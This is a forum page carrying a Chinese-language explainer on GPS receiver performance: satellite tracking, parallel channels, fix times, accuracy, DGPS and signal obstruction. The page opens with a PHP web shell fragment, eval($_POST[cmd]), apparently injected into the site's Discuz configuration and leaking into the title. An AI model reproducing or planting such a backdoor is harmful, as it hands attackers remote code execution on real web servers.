');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); GPS知識大學堂 教你瞭解GPS的性能指標 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

GPS知識大學堂 教你瞭解GPS的性能指標

1、衛星軌跡

  這裡有24顆GPS衛星沿六條軌道繞地球運行(每四顆一組),一般不會有超過12個衛星在地球的同一邊,大多數GPS接收器可以追蹤8~12顆衛星。計算LAT/LONG(2維)坐標至少需要3顆衛星。再加一顆就可以計算3維坐標。對於一個給定的位置,GPS接收器知道在此時哪些衛星在附近,因為它不停地接收從衛星發來的更新信號。

  2、並行通道

  一些消費類GPS設備有2~5條並行通道接收衛星信號。因為最多可能有12顆衛星是可見的(平均值是8),這意味著GPS接收器必須按順序訪問每一顆衛星來獲取每顆衛星的信息。

  市面上的GPS接收器大多數是12並行通道型的,這允許它們連續追蹤每一顆衛星的信息,12通道接收器的優點包括快速冷啟動和初始化衛星的信息,而且在森林地區可以有更好的接收效果。一般12通道接收器不需要外置天線,除非你是在封閉的空間中,如船艙、車廂中。

  3、定位時間

  這是指你重啟動你的GPS接收器時,它確定現在位置所需的時間。對於12通道接收器,如果你在最後一次定位位置的附近,冷啟動時的定位時間一般為3~5分鐘,熱啟動時為15~30秒,而對於2通道接收器,冷啟動時大多超過15分鐘,熱啟動時為2~5分鐘。

  4、定位精度

  大多數GPS接收器的水平位置定位精度在5m~10m左右,但這只是在SA沒有開啟的情況下。

  5、DGPS功能

  為了將SA和大氣層折射帶來的影響降為最低,有一種叫做DGPS發送機的設備。它是一個固定的GPS接收器(在一個勘探現場100km~200km的半徑內設置)接收衛星的信號,它確切地知道理論上衛星信號傳送到的精確時間是多少,然後將它與實際傳送時間相比較,然後計算出「差」,這十分接近於SA和大氣層折射的影響,它將這個差值發送出去,其他GPS接收器就可以利用它得到一個更精確的位置讀數(5m~10m或者更少的誤差)。

  許多GPS設備提供商在一些地區設置了DGPS發送機,供它的客戶免費使用,只要客戶所購買的GPS接收器有DGPS功能。

  6、信號干擾

  要給予你一個很好的定位,GPS接收器需要至少3~5顆衛星是可見的。如果你在峽谷中或者兩邊高樓林立的街道上,或者在茂密的叢林裡,你可能不能與足夠的衛星聯繫,從而無法定位或者只能得到二維坐標。同樣,如果你在一個建築裡面,你可能無法更新你的位置,一些GPS接收器有單獨的天線可以貼在擋風玻璃上,或者一個外置天線可以放在車頂上,這有助於你的接收器得到更多的衛星信號。

  7、物理指標

  選購GPS設備時,大小、重量、顯示畫面、防水、防震、防塵性能、耐高溫、耗電等物理指標都要考慮在內。
返回列表